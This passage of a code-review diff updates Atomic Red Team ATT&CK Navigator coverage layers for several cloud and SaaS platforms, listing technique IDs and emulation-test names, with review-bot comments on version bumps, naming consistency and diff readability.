ListSecrets\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"}]},{"techniqueID":"T1609","score":2,"enabled":true,"comment":"\n- ExecIntoContainer\n- Docker Exec Into Container\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1609/T1609.md"}]},{"techniqueID":"T1610","score":1,"enabled":true,"comment":"\n- Deploy Docker container\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1610/T1610.md"}]},{"techniqueID":"T1611","score":3,"enabled":true,"comment":"\n- Deploy container using nsenter container escape\n- Mount host filesystem to escape privileged Docker container\n- Privilege 
Escalation via Docker Volume Mapping\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1611/T1611.md"}]},{"techniqueID":"T1612","score":1,"enabled":true,"comment":"\n- Build Image On Host\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1612/T1612.md"}]},{"techniqueID":"T1613","score":2,"enabled":true,"comment":"\n- Docker Container and Resource Discovery\n- Podman Container and Resource Discovery\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1613/T1613.md"}]}]}
@@ -1 +1 @@
{"name":"Atomic Red Team (ESXi)","versions":{"attack":"18","navigator":"5.3.0","layer":"4.5"},"description":"Atomic Red Team (ESXi) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[]}
{"name":"Atomic Red Team (ESXi)","versions":{"attack":"16","navigator":"5.1.0","layer":"4.5"},"description":"Atomic Red Team (ESXi) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[]}
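Review bot: Both the old and new ESXi layer carry an empty `"techniques":[]`, so this file only ever gains the version bump; if the repository has atomics with `esxi` in `supported_platforms`, the platform filter that feeds this layer is not matching them, and if it has none, an empty layer is expected but worth confirming in the PR description rather than silently shipping.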
@@ -1 +1 @@
{"name":"Atomic Red Team (Google-Workspace)","versions":{"attack":"18","navigator":"5.3.0","layer":"4.5"},"description":"Atomic Red Team (Google-Workspace) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1078","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078/T1078.md"}]},{"techniqueID":"T1078.004","score":1,"enabled":true,"comment":"\n- Creating GCP Service Account and Service Account Key\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"}]}]}
{"name":"Atomic Red Team (Google-Workspace)","versions":{"attack":"16","navigator":"5.1.0","layer":"4.5"},"description":"Atomic Red Team (Google-Workspace) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1078","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078/T1078.md"}]},{"techniqueID":"T1078.004","score":1,"enabled":true,"comment":"\n- Creating GCP Service Account and Service Account Key\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"}]}]}
@@ -1 +1 @@
{"name":"Atomic Red Team (Iaas:AWS)","versions":{"attack":"18","navigator":"5.3.0","layer":"4.5"},"description":"Atomic Red Team (Iaas:AWS) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1098","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}],"comment":"\n- AWS - Create a group and add a user to that group\n"},{"techniqueID":"T1098.001","score":1,"enabled":true,"comment":"\n- AWS - Create Access Key and Secret Key\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"}]},{"techniqueID":"T1110","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110/T1110.md"}]},{"techniqueID":"T1110.003","score":1,"enabled":true,"comment":"\n- AWS - Password Spray an AWS using GoAWSConsoleSpray\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1136","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136/T1136.md"}]},{"techniqueID":"T1136.003","score":1,"enabled":true,"comment":"\n- AWS - Create a new IAM user\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"}]},{"techniqueID":"T1201","score":1,"enabled":true,"comment":"\n- Examine AWS Password Policy\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"}]},{"techniqueID":"T1526","score":1,"enabled":true,"comment":"\n- AWS - Enumerate common cloud services\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1526/T1526.md"}]},{"techniqueID":"T1530","score":1,"enabled":true,"comment":"\n- AWS - Scan for Anonymous Access to S3\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1530/T1530.md"}]},{"techniqueID":"T1552","score":1,"enabled":true,"comment":"\n- AWS - Retrieve EC2 Password Data using stratus\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1562","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562/T1562.md"}]},{"techniqueID":"T1562.001","score":1,"enabled":true,"comment":"\n- AWS - GuardDuty Suspension or Deletion\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]},{"techniqueID":"T1562.008","score":7,"enabled":true,"comment":"\n- AWS - CloudTrail Changes\n- AWS - Disable CloudTrail Logging Through Event Selectors using Stratus\n- AWS - CloudTrail Logs Impairment Through S3 Lifecycle Rule using Stratus\n- AWS - Remove VPC Flow Logs using Stratus\n- AWS - CloudWatch Log Group Deletes\n- AWS CloudWatch Log Stream Deletes\n- AWS - Config Logs Disabled\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]},{"techniqueID":"T1578","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1578/T1578.md"}]},{"techniqueID":"T1578.001","score":1,"enabled":true,"comment":"\n- AWS - Create 
Snapshot from EBS Volume\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1578.001/T1578.001.md"}]},{"techniqueID":"T1580","score":2,"enabled":true,"comment":"\n- AWS - EC2 Enumeration from Cloud Instance\n- AWS - EC2 Security Group Enumeration\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1580/T1580.md"}]},{"techniqueID":"T1619","score":1,"enabled":true,"comment":"\n- AWS S3 Enumeration\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1619/T1619.md"}]},{"techniqueID":"T1648","score":1,"enabled":true,"comment":"\n- Lambda Function Hijack\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1648/T1648.md"}]},{"techniqueID":"T1651","score":1,"enabled":true,"comment":"\n- AWS Run Command (and Control)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1651/T1651.md"}]}]}
{"name":"Atomic Red Team (Iaas:AWS)","versions":{"attack":"16","navigator":"5.1.0","layer":"4.5"},"description":"Atomic Red Team (Iaas:AWS) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1098","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}],"comment":"\n- AWS - Create a group and add a user to that group\n"},{"techniqueID":"T1098.001","score":1,"enabled":true,"comment":"\n- AWS - Create Access Key and Secret Key\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"}]},{"techniqueID":"T1110","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110/T1110.md"}]},{"techniqueID":"T1110.003","score":1,"enabled":true,"comment":"\n- AWS - Password Spray an AWS using GoAWSConsoleSpray\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1136","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136/T1136.md"}]},{"techniqueID":"T1136.003","score":1,"enabled":true,"comment":"\n- AWS - Create a new IAM user\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"}]},{"techniqueID":"T1201","score":1,"enabled":true,"comment":"\n- Examine AWS Password Policy\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"}]},{"techniqueID":"T1526","score":1,"enabled":true,"comment":"\n- AWS - Enumerate common cloud services\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1526/T1526.md"}]},{"techniqueID":"T1530","score":1,"enabled":true,"comment":"\n- AWS - Scan for Anonymous Access to S3\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1530/T1530.md"}]},{"techniqueID":"T1552","score":1,"enabled":true,"comment":"\n- AWS - Retrieve EC2 Password Data using stratus\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1562","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562/T1562.md"}]},{"techniqueID":"T1562.001","score":1,"enabled":true,"comment":"\n- AWS - GuardDuty Suspension or Deletion\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]},{"techniqueID":"T1562.008","score":6,"enabled":true,"comment":"\n- AWS - CloudTrail Changes\n- AWS - Disable CloudTrail Logging Through Event Selectors using Stratus\n- AWS - CloudTrail Logs Impairment Through S3 Lifecycle Rule using Stratus\n- AWS - Remove VPC Flow Logs using Stratus\n- AWS - CloudWatch Log Group Deletes\n- AWS CloudWatch Log Stream Deletes\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]},{"techniqueID":"T1578","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1578/T1578.md"}]},{"techniqueID":"T1578.001","score":1,"enabled":true,"comment":"\n- AWS - Create Snapshot from EBS 
Volume\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1578.001/T1578.001.md"}]},{"techniqueID":"T1580","score":2,"enabled":true,"comment":"\n- AWS - EC2 Enumeration from Cloud Instance\n- AWS - EC2 Security Group Enumeration\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1580/T1580.md"}]},{"techniqueID":"T1619","score":1,"enabled":true,"comment":"\n- AWS S3 Enumeration\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1619/T1619.md"}]},{"techniqueID":"T1648","score":1,"enabled":true,"comment":"\n- Lambda Function Hijack\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1648/T1648.md"}]},{"techniqueID":"T1651","score":1,"enabled":true,"comment":"\n- AWS Run Command (and Control)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1651/T1651.md"}]}]}
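Review bot: the two versions of this line differ in versions.attack (18 vs 16), versions.navigator (5.3.0 vs 5.1.0) and the T1562/T1562.008 scores (8/7 vs 7/6), the extra T1562.008 entry being "AWS - Config Logs Disabled"; in both versions the parent T1562 score equals T1562.001 + T1562.008, so the roll-up is consistent. One naming nit in the T1562.008 comment: "AWS CloudWatch Log Stream Deletes" lacks the "AWS - " separator used by every sibling entry (compare "AWS - CloudWatch Log Group Deletes"), which shows up as an inconsistent bullet in the Navigator tooltip; fix the atomic's display name at the source rather than patching the generated layer.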
@@ -1 +1 @@
{"name":"Atomic Red Team (Iaas:Azure)","versions":{"attack":"18","navigator":"5.3.0","layer":"4.5"},"description":"Atomic Red Team (Iaas:Azure) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1078","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078/T1078.md"}]},{"techniqueID":"T1078.004","score":1,"enabled":true,"comment":"\n- Azure Persistence Automation Runbook Created or Modified\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"}]},{"techniqueID":"T1098","score":2,"enabled":true,"comment":"\n- Azure - adding user to Azure role in subscription\n- Azure - adding service principal to Azure role in subscription\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1526","score":2,"enabled":true,"comment":"\n- Azure - Dump Subscription Data with MicroBurst\n- Azure - Enumerate common cloud services\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1526/T1526.md"}]},{"techniqueID":"T1528","score":2,"enabled":true,"comment":"\n- Azure - Functions code upload - Functions code injection via Blob upload\n- Azure - Functions code upload - Functions code injection via File Share modification to retrieve the Functions identity access token\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1528/T1528.md"}]},{"techniqueID":"T1530","score":1,"enabled":true,"comment":"\n- Azure - Dump Azure Storage Account Objects via Azure CLI\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1530/T1530.md"}]},{"techniqueID":"T1552","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1552.005","score":1,"enabled":true,"comment":"\n- Azure - Dump Azure Instance Metadata from Virtual Machines\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.005/T1552.005.md"}]},{"techniqueID":"T1555","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555/T1555.md"}]},{"techniqueID":"T1555.006","score":1,"enabled":true,"comment":"\n- Azure - Dump All Azure Key Vaults with Microburst\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.006/T1555.006.md"}]},{"techniqueID":"T1562","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562/T1562.md"}]},{"techniqueID":"T1562.008","score":1,"enabled":true,"comment":"\n- Azure - Eventhub Deletion\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]},{"techniqueID":"T1578","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1578/T1578.md"}]},{"techniqueID":"T1578.001","score":1,"enabled":true,"comment":"\n- Azure - Create Snapshot from Managed Disk\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1578.001/T1578.001.md"}]},{"techniqueID":"T1619","score":3,"enabled":true,"comment":"\n- Azure - Enumerate Storage Account Objects via Shared Key authorization using Azure CLI\n- Azure - Scan for Anonymous Access to Azure Storage 
(Powershell)\n- Azure - Enumerate Azure Blobs with MicroBurst\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1619/T1619.md"}]}]}
{"name":"Atomic Red Team (Iaas:Azure)","versions":{"attack":"16","navigator":"5.1.0","layer":"4.5"},"description":"Atomic Red Team (Iaas:Azure) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1078","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078/T1078.md"}]},{"techniqueID":"T1078.004","score":1,"enabled":true,"comment":"\n- Azure Persistence Automation Runbook Created or Modified\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"}]},{"techniqueID":"T1098","score":2,"enabled":true,"comment":"\n- Azure - adding user to Azure role in subscription\n- Azure - adding service principal to Azure role in subscription\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1526","score":2,"enabled":true,"comment":"\n- Azure - Dump Subscription Data with MicroBurst\n- Azure - Enumerate common cloud services\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1526/T1526.md"}]},{"techniqueID":"T1528","score":2,"enabled":true,"comment":"\n- Azure - Functions code upload - Functions code injection via Blob upload\n- Azure - Functions code upload - Functions code injection via File Share modification to retrieve the Functions identity access token\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1528/T1528.md"}]},{"techniqueID":"T1530","score":1,"enabled":true,"comment":"\n- Azure - Dump Azure Storage Account Objects via Azure CLI\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1530/T1530.md"}]},{"techniqueID":"T1552","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1552.005","score":1,"enabled":true,"comment":"\n- Azure - Dump Azure Instance Metadata from Virtual Machines\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.005/T1552.005.md"}]},{"techniqueID":"T1555","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555/T1555.md"}]},{"techniqueID":"T1555.006","score":1,"enabled":true,"comment":"\n- Azure - Dump All Azure Key Vaults with Microburst\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.006/T1555.006.md"}]},{"techniqueID":"T1562","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562/T1562.md"}]},{"techniqueID":"T1562.008","score":1,"enabled":true,"comment":"\n- Azure - Eventhub Deletion\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]},{"techniqueID":"T1578","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1578/T1578.md"}]},{"techniqueID":"T1578.001","score":1,"enabled":true,"comment":"\n- Azure - Create Snapshot from Managed Disk\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1578.001/T1578.001.md"}]},{"techniqueID":"T1619","score":3,"enabled":true,"comment":"\n- Azure - Enumerate Storage Account Objects via Shared Key authorization using Azure CLI\n- Azure - Scan for Anonymous Access to Azure Storage 
(Powershell)\n- Azure - Enumerate Azure Blobs with MicroBurst\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1619/T1619.md"}]}]}
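Review bot: the technique list, scores and comments are identical between the two versions of this line; only versions.attack (18 vs 16) and versions.navigator (5.3.0 vs 5.1.0) change. Bumping the ATT&CK version without touching the technique set is only safe if every techniqueID here (T1078.004, T1098, T1526, T1528, T1530, T1552.005, T1555.006, T1562.008, T1578.001, T1619) still exists and is unrevoked in the target release, and nothing visible in this diff checks that, so it is worth verifying once rather than relying on the Navigator silently dropping unknown IDs. Minor: "Azure - adding user to Azure role in subscription" and "Azure - adding service principal to Azure role in subscription" are the only lower-case test names in the layer.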
@@ -1 +1 @@
{"name":"Atomic Red Team (Iaas:GCP)","versions":{"attack":"18","navigator":"5.3.0","layer":"4.5"},"description":"Atomic Red Team (Iaas:GCP) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1078","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078/T1078.md"}]},{"techniqueID":"T1078.004","score":2,"enabled":true,"comment":"\n- Creating GCP Service Account and Service Account Key\n- GCP - Create Custom IAM Role\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"}]},{"techniqueID":"T1098","score":1,"enabled":true,"comment":"\n- GCP - Delete Service Account Key\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1485","score":1,"enabled":true,"comment":"\n- GCP - Delete Bucket\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"}]},{"techniqueID":"T1562","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562/T1562.md"}]},{"techniqueID":"T1562.008","score":1,"enabled":true,"comment":"\n- GCP - Delete Activity Event Log\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]},{"techniqueID":"T1578","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1578/T1578.md"}]},{"techniqueID":"T1578.001","score":1,"enabled":true,"comment":"\n- GCP - Create Snapshot from Persistent 
Disk\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1578.001/T1578.001.md"}]}]}
{"name":"Atomic Red Team (Iaas:GCP)","versions":{"attack":"16","navigator":"5.1.0","layer":"4.5"},"description":"Atomic Red Team (Iaas:GCP) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1078","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078/T1078.md"}]},{"techniqueID":"T1078.004","score":2,"enabled":true,"comment":"\n- Creating GCP Service Account and Service Account Key\n- GCP - Create Custom IAM Role\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"}]},{"techniqueID":"T1098","score":1,"enabled":true,"comment":"\n- GCP - Delete Service Account Key\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1485","score":1,"enabled":true,"comment":"\n- GCP - Delete Bucket\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"}]},{"techniqueID":"T1562","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562/T1562.md"}]},{"techniqueID":"T1562.008","score":1,"enabled":true,"comment":"\n- GCP - Delete Activity Event Log\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]},{"techniqueID":"T1578","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1578/T1578.md"}]},{"techniqueID":"T1578.001","score":1,"enabled":true,"comment":"\n- GCP - Create Snapshot from Persistent 
Disk\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1578.001/T1578.001.md"}]}]}
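Review bot: same version-only change as the other layers, and the same reviewability problem: because each layer is serialised as a single line, a two-field metadata bump produces a whole-file replacement that a reviewer cannot read and the rendered diff cannot narrow down to the fields that actually changed. Whatever emits these layers should write them with indentation (in Python, json.dump(layer, fh, indent=2)) or at least one technique object per line, so the next regeneration diff shows exactly which scores and comments moved.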
File diff suppressed because one or more lines are too long
@@ -1 +1 @@
{"name":"Atomic Red Team (Office-365)","versions":{"attack":"18","navigator":"5.3.0","layer":"4.5"},"description":"Atomic Red Team (Office-365) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1098","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1098.002","score":1,"enabled":true,"comment":"\n- EXO - Full access mailbox permission granted to a user\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.002/T1098.002.md"}]},{"techniqueID":"T1114","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114/T1114.md"}]},{"techniqueID":"T1114.002","score":1,"enabled":true,"comment":"\n- Office365 - Remote Mail Collected\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.002/T1114.002.md"}]},{"techniqueID":"T1114.003","score":1,"enabled":true,"comment":"\n- Office365 - Email Forwarding\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.003/T1114.003.md"}]},{"techniqueID":"T1562","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562/T1562.md"}]},{"techniqueID":"T1562.001","score":1,"enabled":true,"comment":"\n- office-365-Disable-AntiPhishRule\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]},{"techniqueID":"T1562.008","score":2,"enabled":true,"comment":"\n- Office 365 - Exchange Audit Log 
Disabled\n- Office 365 - Set Audit Bypass For a Mailbox\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]},{"techniqueID":"T1564","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564/T1564.md"}]},{"techniqueID":"T1564.008","score":1,"enabled":true,"comment":"\n- New-Inbox Rule to Hide E-mail in M365\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.008/T1564.008.md"}]}]}
